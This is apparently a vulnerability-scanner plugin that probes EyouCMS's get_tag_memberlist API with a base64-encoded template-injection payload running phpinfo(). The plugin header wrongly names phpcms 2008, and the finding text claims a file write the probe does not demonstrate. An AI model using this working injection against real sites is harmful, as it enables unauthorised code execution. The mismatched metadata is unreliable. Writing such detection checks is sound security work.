# Author:w8ay
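# Name:phpcms 2008 rce
# NOTE(review): the name above does not match this check. The reference link and the
# "name" field returned by poc() both refer to EyouCMS, so the header was probably copied from another plugin.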
'''
referer: http://www.lovei.org/archives/EyouCMS-SSTI.html
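description: An attacker can exploit this vulnerability by crafting a malicious URL to write a file with arbitrary content to the server, achieving remote code execution.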
'''
import HackRequests

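def poc(arg, **kwargs):
    """Check a target for the EyouCMS ``get_tag_memberlist`` template-injection flaw.

    Sends a single POST to ``/index.php?m=api&c=Ajax&a=get_tag_memberlist``
    whose ``attarray`` field is a base64 blob carrying a phpinfo() probe.
    The target is reported only when the response looks like genuine
    phpinfo() output, not merely when the word "phpinfo" appears in it.

    Args:
        arg: Base URL of the target; a trailing slash is tolerated.
        **kwargs: Ignored by this check.

    Returns:
        A dict with ``name``, ``content``, ``url``, ``log`` and ``tag`` keys
        when the probe is evaluated by the server, otherwise ``None``.
    """
    request_headers = {
        "X-Requested-With": "XMLHttpRequest",
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    }
    # Strip a trailing slash so "http://host/" does not produce "//index.php".
    probe_url = arg.rstrip("/") + "/index.php?m=api&c=Ajax&a=get_tag_memberlist"
    post_data = "htmlcode=fuhei&attarray=eyJ9Ijoie3BocH1waHBpbmZvKCk7e1wvcGhwfSJ9"
    hh = HackRequests.http(probe_url, post=post_data, headers=request_headers, timeout=10)
    if hh.status_code != 200:
        return None

    body = hh.text()
    # A page that merely echoes the submitted tag, or an error/WAF page that
    # mentions "phpinfo", would satisfy a bare substring test and be reported
    # as RCE. Rendered phpinfo() output also carries a "PHP Version" heading,
    # so require both markers before flagging the target.
    if 'phpinfo' not in body or 'PHP Version' not in body:
        return None

    # NOTE(review): "content" describes an unauthorised file write, while this
    # probe only shows that the injected tag was evaluated - confirm the wording.
    return {
        "name": "EyouCms1_4_2_rce",  # plugin name
        "content": "攻击者利用该漏洞，可在未授权的情况下实现对网站文件的写入。该漏洞危害程度为高危(High)。",  # finding details: what the impact is
        "url": probe_url,  # URL where the issue was observed
        "log": hh.log,  # exchange log exposed by the HackRequests response
        "tag": "rce"  # vulnerability tag
    }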

if __name__ == "__main__":
    # Running the file directly does nothing; presumably poc() is invoked by
    # the scanner framework that loads this plugin - confirm against the loader.
    pass